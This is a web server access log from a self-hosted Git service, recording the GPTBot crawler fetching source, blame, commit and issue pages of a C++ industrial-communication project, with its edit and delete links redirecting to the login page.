"https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:59:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:59:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:59:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:59:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11304] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13398] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:59:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11617] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:18:59:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 13077] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12982] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:18:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10096] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13990] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 1011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10713] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:18:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:18:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:18:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:59:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:18:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] 